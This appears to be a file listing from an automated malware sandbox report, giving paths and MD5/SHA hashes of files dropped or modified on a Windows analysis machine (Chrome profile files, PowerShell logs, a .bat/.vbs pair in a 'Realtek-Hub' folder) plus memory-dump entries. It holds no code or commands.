Filesize
649B

MD5
6b8d70d3308fdfc281e0d96366377876

SHA1
a35fae80cf7eb44f348db0a956ed709d95a52fb7

SHA256
a16283ed64c83061b5ac884f5eb3a08836f379c4db761679bb0969f79067abda

SHA512
ac2d2b881b3e924b0adb564f7f1e60de529b7487b64456ee2ddaf5c080081f7453988a0a46b4a382531e922ba9255fa481e2f9a092fc82c99f5443f635901e06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
05b116fcf59960588a2dcdd41d8c77bb

SHA1
52490f3a0514d7eca385482ca73255bf4c8956ca

SHA256
1e1426bd105d032c2f8e9451e056c4674e923d80426bc153294ac80a794772a0

SHA512
8a29c3a16d39b3485380f693765f5ad09b047cadae1b84182e22c3d342dfd243fbf97868be73c3a33fe308a83c49150ba01a607ad6e8e3f2a712983862924b54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
25a5c4402303fc3f0b573db112d61c3c

SHA1
739a3b33b0156959b3a02795bd4656e87f93c4bb

SHA256
b8228477f6a2315f92e95985c8d6bcd5146c98c605e6016d00b1d49958df1879

SHA512
1689a70a84da72d9abad261dfc6838f5c9962e41adbd51755d05eaf0d080029c2f8af1f01cd9cb82da2d76385461c7821cdd73b7ca1e3bcc107f8017c0682928

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d2e73ce52c55baf75bf2579319bf535e

SHA1
315efab2d2d8083aa7955b8b960c06514f4c5ea1

SHA256
62dd5049ac8ee37d5da53b03dc97644405426c289b744f49f9d08dc938b24053

SHA512
529d3467d4799032a707ab8a81d1073328fd5b5ff500a7b893729275c08a2ba51ebfea251fcfd6a6c96450916cfc7ef5904515bca94049b5a2eb58d7bd0fbd0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d14ea2fd84f281ac05a52e74fa664151

SHA1
9bd269f1ef50c43874727a046d6db05cefcc7ba5

SHA256
565d906d5913a96fc09286e71fbcab0e683e4f9e766605e6cf75a6e844a69815

SHA512
a86cbde1a8dfc26329511efc514a3578626ef6ddd3fb1d468489d44998853d04dc92523ba0108704054498370db2878d2cbfa2a164ed011ebadcfd469bf4c9cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
dc1bb7c9a08cd857fe11e9399b4415ae

SHA1
4b6b080602b6c92e20addff794e45e126d45e68b

SHA256
d018a135aa4671877fcbd272fe4169a7a1a845356ccbe53bddc516a416b07e6e

SHA512
cef07d4ef05ed57442e836f1d1ef8661600ecee1ff849dc35eb310ca8e11848b629fa0fd2ae534d781af084ab7e83b0e1502c3717a2d44b89802a97c9c2b02c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
ebe76b72dd31eea05d16070989ca8f91

SHA1
65b7bf8a59bc2e5e377e4329d0a617eb8e363ddf

SHA256
6b908279340e7906f8d7256f852539e6fb800d80bf0a7303dcabf41b9a666f0d

SHA512
17954407802926b2da86a95c2dd7e087d47133f508bf26584006d4081afbc271b5b558016522fc87dfdeeab5619127d7d41c3b01427090473e622f957aaf8a04

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
d3f3e1953421ff281e491dd61ea38011

SHA1
76f05cbbf9892af0f8c41ba708260afbd1c6f830

SHA256
9df88f9ce28f994148ea9c8826de18f8b1afa5b2f1551f237058c7ae0bc64d0d

SHA512
4a2b83f433367bb2bc92180ac062a6e50b33967f26efa908bcc8ef4a1caa7fa7c4ca5126cacaddf395f37c62269791c5028800df3d92f913b343ff18b988b976

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
d98a24d7f83a1905302198b7d9e25a5a

SHA1
20cd3e552a4b430629364b21be90d79f20881888

SHA256
d22215da92365ef443af5a7757d6eb51530f8d5348107eade0423c81439597c9

SHA512
75888a97f9fb3d9baf0d8e00dc3a9e57e6696c89a62ee90e7e58bf9999129620b2521b7b4ca97de0f5f20c59416044dcbabd139011145c045bed3137ff750852

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
70d305ad1c2299cf1d33765d280bbf75

SHA1
27d3b26650cd6794aed258c1dca6d1c5307a9d1d

SHA256
fa988b8dab3231b021d313f88513b075569d1b618125848d111311a95267906e

SHA512
9151b0cd430e2ebf2749bfc087989240f2d7296c7fe05cea9a34d903a345cfb28d087f013ff9585c06dcbe290526947588e1086da268bda9d6dd73551e16f803

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f8f22fd5d2b19935f8a6268fabe255c

SHA1
fea7116a5e56c501439fa0261d2c89564c939a1b

SHA256
c3129137313ae7bd0bc8b22bd043708e9890398876608f45c0ad33108a41d5c2

SHA512
2f5af078f6ec28116349e1dc4c05b4d6dc9bdcbe4f28bbeb0f43e1492a8a1aaaff074f4ea2a8119c3ea728c15ae721ecdaafad1d6a1edda208ee5dbc16b347ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
53fe4e0073b78c8f3a82f10c0e7ca964

SHA1
16f0a844b202b39861c3812545c421cc3b45d024

SHA256
ee73ba7ae33094552e21d81bf172582ddf8c5032d7db96bd4d38a25dac655ebf

SHA512
0a70a02618dac91e340e09fd6d3fedc1916fb0983cf6f396608467de984677a28600b4aaff46ba03301bb5b0bd82ac79cba96ab749a648a59cd32ee5b0e74061

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\86c47ac0-28a5-4b9e-a099-1d96ff71f39a.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\zt4hqa3ldcd1.bat

Filesize
115KB

MD5
a291659c73e487039ba0d4ed584d2335

SHA1
10b534a148cd151d32bf41fb8674acd5bc98493e

SHA256
3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

SHA512
797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\zt4hqa3ldcd1.vbs

Filesize
149B

MD5
de3d55d8b1dae0ff4afb4b60c35cb742

SHA1
a74fd93c5b5e0146c1c50391330226687c6fb200

SHA256
6997f073408f611c2adb869e70d373ba35f3edf5b2e05c3e48fad38ec4143bb5

SHA512
c2ab1b91fcab56b1a922ef047a2a1c56a9117eb2d6edada3ebe8e76e35c50275d4658347529b45efbeff2169858d0d46930067908375dbb4f7de9a5505bb5442

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s51vkddp.rx0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir2160_895760652\5acc6b15-0f90-4adf-9c3e-257a7a538c64.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir2160_895760652\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
2KB

MD5
3e3d1d9bfcefe38baa2b7a84468847b9

SHA1
c69f06190f68f69be7d57b733053824d683e893b

SHA256
f06b52917cb399610ae7477c3b77164c49bd987a1f8a8b683a2511d43b6cbeb3

SHA512
b2e2d67ae0e712d9acad031f7e8050d1af156155b92b8e6518a2d16beaca2efd17074cc33a9775b9db5cd312143d383877fd847ca89b2a5a679ed3f15acae7d2

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
11KB

MD5
fb4a7c0483f085e58f65cad0b7c04a1a

SHA1
c806fc0b2a76b57e711e3ad8948354d188490fa5

SHA256
ece65f8c300d778f7b3e5200828321306727fa9ca7658dfcef6f8169ee53654f

SHA512
43d64ba9eb57e8f365b1cfd299f26e03bbf2fa18d0a913c75e145582fedfa069af91406de308aa163f95a2f5c03439f26d4923983bf1385b228a6026cd8ae4c5

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
12KB

MD5
21a39b8aaf178e41995d4ea969e8e7bf

SHA1
49db43ef44eb6470c5d18519e6ffc625a01bbc3f

SHA256
d17c938a1e76adc8dfc26bcd686d7ef6008d8667d4bf7909b2759ed00cfe6b76

SHA512
f9dca5f4f2dee5711ad4512cafac4b941d6e13e07b9e5aebb383ef8dfece1982c76aa12a49f6d2ee2b6d9f1dbd2235f5203291653e03ba44c6cd3c100e1f2e85

Download Submit
C:\Windows\system32\Recovery\ReAgent.xml

Filesize
1KB

MD5
910f3916ede823b6b4b5e302e6ececbe

SHA1
d41dda3f32687605193ad0f421c6b3e2bc48ec97

SHA256
5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa

SHA512
893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582

Download Submit
memory/2764-69-0x0000022873190000-0x00000228731A0000-memory.dmp

Filesize
64KB

Download
memory/4220-13-0x00000231AF020000-0x00000231AF028000-memory.dmp

Filesize
32KB

Download
memory/4220-0-0x00007FF9CB0B3000-0x00007FF9CB0B5000-memory.dmp

Filesize
8KB

Download
memory/4220-14-0x00000231AF140000-0x00000231AF152000-memory.dmp

Filesize
72KB

Download
memory/4220-79-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4220-12-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4220-11-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4220-10-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4220-9-0x00000231C7270000-0x00000231C7292000-memory.dmp

Filesize
136KB

Download
memory/4960-41-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4960-30-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4960-21-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download
memory/4960-20-0x00007FF9CB0B0000-0x00007FF9CBB72000-memory.dmp

Filesize
10.8MB

Download